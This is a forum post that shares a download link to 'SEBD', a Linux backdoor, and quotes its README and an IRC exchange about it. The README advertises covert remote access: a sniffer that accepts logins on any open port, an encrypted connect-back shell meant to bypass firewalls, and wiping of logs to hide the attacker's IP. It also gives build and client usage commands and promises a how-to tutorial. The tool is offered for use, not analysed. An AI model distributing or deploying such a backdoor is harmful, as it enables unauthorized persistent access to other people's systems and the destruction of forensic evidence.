SEBD - Simple Encrypted Backdoor for Linux
10-01-2013, 04:44 AM
#1
http://mybb.rsadvance.net/sebd-0.2-new.tgz
I found this on an excursion to the land of EFnet and decided I'd share it.
This is an interesting little backdoor for Linux and other Unix-like OSes and I'll be writing a tutorial on how to use it soon. Watch this space. Should be up by tomorrow.
Until then, have a c/p from the README file.
Quote:
[23:48:24] Oni | SL: So I could set it to 80 on box running apache/nginx?
[23:48:36] Oni | SL: on a*
[23:48:40] Starfall: it "listens on all ports" using a pcap-based sniffer
[23:48:47] Starfall: the SERVER_PORT is the port you're receiving the back connect shell on
[23:48:49] Oni | SL: Ah.
Instructions for compiling: ./configure;make
Configure script does all the editing config.h for you, I removed that bit after realizing that.
slider Wrote:
sebd v0.1 (simple encrypted backdoor)
sebd is another linux backdoor.
what does sebd provide:
- a raw sniffer
- aes encrypted shell
- full tty/pty support
- connect back (bypass most of the firewalls)
- does not open a port
- you can log in on any opened port
- cleans the logs (wipes out the ip from where the sniffer received the password)
- tcpd function (if the password is from an ip that isn't in the list -> no shell)
- password is encrypted with DES (hardcoded only in the server binary)
usage:
on the server host run: ./sebd
on the client host run: ./client -h host|ip -d port
AUTHOR: slider
EMAIL: slider@go.ro
PS: check out the CREDITS...it's only a hack
PGP
Sign: F202 79C9 76F7 40BB 54EC 494F 5DEF 1D70 14C1 C4CC
Encrypt: A5B3 1B21 55E1 80AF 4C6E DE83 467B 8EFC 3DEE 681C
Auth: CD55 E8A5 1A08 2933 8BA6 BC88 D81F 1943 739A 3C47